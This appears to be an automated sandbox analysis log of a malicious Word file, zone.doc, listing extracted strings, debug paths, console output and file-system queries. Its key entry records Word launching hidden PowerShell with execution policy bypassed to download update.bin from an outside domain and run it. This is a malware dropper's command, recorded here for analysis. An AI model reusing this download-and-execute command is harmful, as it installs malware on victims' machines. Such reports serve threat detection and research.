Source: powershell.exe | String found in binary or memory: file:// |
Source: WINWORD.EXE, powershell.exe | String found in binary or memory: file:/// |
Source: WINWORD.EXE | String found in binary or memory: file:///c: |
Source: WINWORD.EXE | String found in binary or memory: file:///c:/users/admin/oaded%20program%20files |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_32/system.transactions/2.0.0.0__b77a5c561934e089/system.transactions |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.commands.diagnostics/1.0.0.0__31bf3856ad36 |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.commands.management/1.0.0.0__31bf3856ad364 |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.commands.utility/1.0.0.0__31bf3856ad364e35 |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.consolehost/1.0.0.0__31bf3856ad364e35/micr |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.security/1.0.0.0__31bf3856ad364e35/microso |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.wsman.management/1.0.0.0__31bf3856ad364e35/microsoft. |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.configuration.install/2.0.0.0__b03f5f7f11d50a3a/system.c |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.core/3.5.0.0__b77a5c561934e089/system.core.dll |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.directoryservices/2.0.0.0__b03f5f7f11d50a3a/system.direc |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.management.automation/1.0.0.0__31bf3856ad364e35/system.m |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.management/2.0.0.0__b03f5f7f11d50a3a/system.management.d |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.xml/2.0.0.0__b77a5c561934e089/system.xml.dll |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/system/2.0.0.0__b77a5c561934e089/system.dll |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/microsoft.net/framework/v2.0.50727/mscorlib.dll |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/system32/windowspowershell/ |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/ |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/; |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/en-us |
Source: WINWORD.EXE | String found in binary or memory: ftp:// |
Source: WINWORD.EXE, powershell.exe | String found in binary or memory: http:// |
Source: powershell.exe | String found in binary or memory: http://nunziatel |
Source: powershell.exe | String found in binary or memory: http://nunziatelh |
Source: powershell.exe | String found in binary or memory: http://nunziatella1787.eu |
Source: powershell.exe | String found in binary or memory: http://nunziatella1787.eu/ |
Source: powershell.exe | String found in binary or memory: http://nunziatella1787.eu/cl |
Source: WINWORD.EXE | String found in binary or memory: http://nunziatella1787.eu/cli/update.b |
Source: powershell.exe | String found in binary or memory: http://nunziatella1787.eu/cli/update.bin |
Source: powershell.exe | String found in binary or memory: http://nunziatella1787.eu/cli/update.binh |
Source: powershell.exe | String found in binary or memory: http://nunziatella1787.eu/cli/uph |
Source: powershell.exe | String found in binary or memory: http://nunziatella1787h |
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationfilter |
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/selectorfilter |
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#identifyresponse |
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#identifyresponseh |
Source: WINWORD.EXE | String found in binary or memory: http://www.msnusers.com |
Source: WINWORD.EXE | String found in binary or memory: https:// |
Source: | Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe |
Source: | Binary string: mscorlib.pdb source: powershell.exe |
Source: | Binary string: dows\mscorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe |
Source: | Binary string: mscorrc.pdb source: powershell.exe |
Source: | Binary string: rlib.pdb source: powershell.exe |
Source: | Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe |
Source: | Binary string: C:\Windows\mscorlib.pdbjj source: powershell.exe |
Source: | Binary string: indows\System.pdbpdbtem.pdb_3 source: powershell.exe |
Source: | Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe |
Source: | Binary string: G:\o14\65_VC8\VBE6\legovbe\vbe7.pdb source: WINWORD.EXE |
Source: | Binary string: indows\mscorlib.pdbpdblib.pdb source: powershell.exe |
Source: | Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbs\a source: powershell.exe |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: .........3.i\............3.i....p.#.L|.i.......m$(.i...mH.9rL|.i4............7.i.......ip.#.H.,.............$(.i...i.... |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<.........,.H......w...................w..0............. ..........................................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<...'...n.e.d. .a.n. .e.r.r.o.r.:. .(.4.0.4.). .N.o.t. .F.o.u.n.d..."...........'.......D...>......w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<...'.....,.H......w...................w..0............. ...9...................'..................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<...3...A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.6.0............. ...a...................3.......D..."......w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<...3.....,.H......w...................w..0............. ...|...................3..................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<...?...H.,........wd..................w..0............. .......................?..................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<...?.....,.H......w...................w..0............. .......................?..................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<...K...H.,........wd..................w..0............. .......................K..................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<...K.....,.H......w...................w..0............. .......................K..................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<...W... .W.S.c.r.i.p.t...S.h.e.l.l.)...E.x.e.c.(.$.f.).....,...................W.......D...0......w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<...W.....,.H......w...................w..0.................G...................W..................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<...c...H.,........wd..................w..0.................o...................c..................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<...c.....,.H......w...................w..0.....................................c..................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<...o...H.,........wd..................w..0.....................................o...........f......w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<...o.....,.H......w...................w..0.....................................o..................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<...{... .,........wd..................w..0.....................................{.......D..........w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<...{.....,.H......w...................w..0.....................................{..................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<.......H.,........wd..................w..0........................................................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<.........,.H......w...................w..0........................................................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<....... .s.p.e.c.i.f.i.e.d............w..0................. ...........................D..........w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<.........,.H......w...................w..0.................;......................................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<.......".,........wd..................w..0.................c...........................D..........w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<.........,.H......w...................w..0.................~......................................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.1.............................................D...$......w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<.........,.H......w...................w..0........................................................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<.......H.,........wd..................w..0........................................................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<.........,.H......w...................w..0........................................................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<.......H.,........wd..................w..0................./......................................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<.........,.H......w...................w..0.................J......................................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<.......p.t...S.h.e.l.l.)...E.x.e.c. .<.<.<.<. .(.$.f.).....r...........................D...0......w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<.........,.H......w...................w..0........................................................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<.......H.,........wd..................w..0........................................................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<.........,.H......w...................w..0........................................................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<.......H.,........wd..................w..0.................................................n......w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<.........,.H......w...................w..0........................................................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........d...<....... .,........wd..................w..0.................;...........................D..........w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............<.........,.H......w...................w..0.................V......................................w........ |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp |
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: unknown | Process created: C:\Windows\System32\wisptis.exe |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://nunziatella1787.eu/cli/update.bin' $f);(New-Object -com WScript.Shell).Exec($f) |
Source: zone.doc | OLE document summary: title field not present or empty |
Source: zone.doc | OLE document summary: author field not present or empty |
Source: zone.doc | OLE document summary: edited time not present or 0 |
Source: zone.doc | OLE document summary: title field not present or empty |
Source: zone.doc | OLE document summary: author field not present or empty |
Source: zone.doc | OLE document summary: edited time not present or 0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2376 | Thread sleep time: -60000ms >= -60000ms |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2304 | Thread sleep time: -922337203685477ms >= -60000ms |
Source: C:\Windows\System32\wisptis.exe TID: 2316 | Thread sleep time: -60000ms >= -60000ms |
Source: C:\Windows\System32\wisptis.exe TID: 2316 | Thread sleep time: -60000ms >= -60000ms |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Queries volume information: C:\ VolumeInformation |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Queries volume information: C:\zone.doc VolumeInformation |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Queries volume information: C:\ VolumeInformation |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Queries volume information: C:\Users\admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC VolumeInformation |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Queries volume information: C:\Users\admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |